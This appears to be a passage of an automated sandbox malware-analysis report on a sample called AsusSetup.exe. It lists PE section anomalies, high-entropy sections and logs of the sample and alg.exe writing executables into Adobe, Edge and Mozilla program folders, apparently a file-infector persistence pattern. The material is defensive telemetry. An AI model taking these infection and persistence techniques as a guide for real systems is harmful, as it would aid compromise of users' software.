Source: AcroCEF.exe0.3.drStatic PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe0.3.drStatic PE information: section name: .didat
Source: SingleClientServicesUpdater.exe0.3.drStatic PE information: section name: _RDATA
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.drStatic PE information: section name: .didat
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.drStatic PE information: section name: _RDATA
Source: MicrosoftEdgeUpdateCore.exe.3.drStatic PE information: section name: .didat
Source: MicrosoftEdgeUpdateOnDemand.exe.3.drStatic PE information: section name: .didat
Source: MicrosoftEdgeUpdateSetup.exe.3.drStatic PE information: section name: .didat
Source: AppVLP.exe.3.drStatic PE information: section name: .c2r
Source: OneDriveSetup.exe.3.drStatic PE information: section name: .didat
Source: AdobeCollabSync.exe.3.drStatic PE information: section name: .didat
Source: AdobeCollabSync.exe.3.drStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\AsusSetup.exeCode function: 0_2_01FD68CE push E9000001h; retn 0000h0_2_01FD68D3
Source: C:\Users\user\Desktop\AsusSetup.exeCode function: 0_2_01FD52E3 push E9000001h; retf 0000h0_2_01FD52E8
Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00BE68CE push E9000001h; retn 0000h7_2_00BE68D3
Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00BE52E3 push E9000001h; retf 0000h7_2_00BE52E8
Source: C:\Windows\System32\FXSSVC.exeCode function: 10_2_00D268CE push E9000001h; retn 0000h10_2_00D268D3
Source: C:\Windows\System32\FXSSVC.exeCode function: 10_2_00D252E3 push E9000001h; retf 0000h10_2_00D252E8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 11_2_009968CE push E9000001h; retn 0000h11_2_009968D3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 11_2_009952E3 push E9000001h; retf 0000h11_2_009952E8
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_00C068CE push E9000001h; retn 0000h12_2_00C068D3
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 12_2_00C052E3 push E9000001h; retf 0000h12_2_00C052E8
Source: AsusSetup.exeStatic PE information: section name: .reloc entropy: 7.909171977386322
Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.926383478449183
Source: FXSSVC.exe.0.drStatic PE information: section name: .reloc entropy: 7.932560428980175
Source: elevation_service.exe.0.drStatic PE information: section name: .reloc entropy: 7.934137158828998
Source: elevation_service.exe0.0.drStatic PE information: section name: .reloc entropy: 7.9362222500865025
Source: identity_helper.exe.3.drStatic PE information: section name: .reloc entropy: 7.9308459503172175
Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: section name: .reloc entropy: 7.924990615411256
Source: 7zFM.exe.3.drStatic PE information: section name: .reloc entropy: 7.922191769230744
Source: 7zG.exe.3.drStatic PE information: section name: .reloc entropy: 7.917678665265775
Source: Acrobat.exe.3.drStatic PE information: section name: .reloc entropy: 7.930139587851669
Source: AcroCEF.exe.3.drStatic PE information: section name: .reloc entropy: 7.9270575714190405
Source: setup.exe.3.drStatic PE information: section name: .reloc entropy: 7.9346434100610885
Source: msedgewebview2.exe.3.drStatic PE information: section name: .reloc entropy: 7.926357085974897
Source: msedge_proxy.exe.3.drStatic PE information: section name: .reloc entropy: 7.932385336292712
Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: .reloc entropy: 7.936513051347911
Source: notification_click_helper.exe.3.drStatic PE information: section name: .reloc entropy: 7.934183706757763
Source: pwahelper.exe.3.drStatic PE information: section name: .reloc entropy: 7.931002327709391
Source: msedge_proxy.exe0.3.drStatic PE information: section name: .reloc entropy: 7.932383792959081
Source: pwahelper.exe0.3.drStatic PE information: section name: .reloc entropy: 7.931007666328552
Source: SingleClientServicesUpdater.exe.3.drStatic PE information: section name: .reloc entropy: 7.934069883170879
Source: AcroCEF.exe0.3.drStatic PE information: section name: .reloc entropy: 7.927076679261827
Source: SingleClientServicesUpdater.exe0.3.drStatic PE information: section name: .reloc entropy: 7.9340774103989355
Source: MicrosoftEdgeUpdateSetup.exe.3.drStatic PE information: section name: .reloc entropy: 7.930281169019227
Source: OneDriveSetup.exe.3.drStatic PE information: section name: .reloc entropy: 7.862432729550158
Source: ADNotificationManager.exe.3.drStatic PE information: section name: .reloc entropy: 7.927081705557461
Source: AdobeCollabSync.exe.3.drStatic PE information: section name: .reloc entropy: 7.894460775779779

Persistence and Installation Behavior

barindex
Creates files in the system32 config directory
Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\9fbf4662b248c49c.binJump to behavior
Drops executable to a common third party application directory
Source: C:\Users\user\Desktop\AsusSetup.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
